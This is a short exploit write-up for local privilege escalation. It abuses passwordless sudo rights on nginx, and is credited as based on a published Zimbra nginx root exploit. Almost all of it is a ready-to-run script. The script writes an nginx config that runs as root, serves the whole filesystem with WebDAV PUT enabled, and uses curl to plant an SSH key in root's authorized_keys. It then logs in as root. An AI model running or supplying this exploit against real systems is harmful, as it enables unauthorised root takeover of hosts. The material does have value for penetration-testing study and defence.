Condition - You must have sudo permission on nginx
:
user@host:~$ sudo -l
Matching Defaults entries for user on host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User user may run the following commands on host:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
From an existing interractive session create the following exploit code:
echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1339;
root /;
autoindex on;
dav_methods PUT;
}
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat .ssh/id_rsa
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat .ssh/id_rsa.pub)"
echo "[+] Use the SSH key to get access"
Then run the exploit:
./exploit.sh
Store the SSH Private Key then use it to connect to the host:
chmod 600 root_key
ssh -i root_key root@host
- Exploit redaction - GRILL Dylan
- Based on Darren Martyn exploit - https://darrenmartynie.wordpress.com/2021/10/25/zimbra-nginx-local-root-exploit/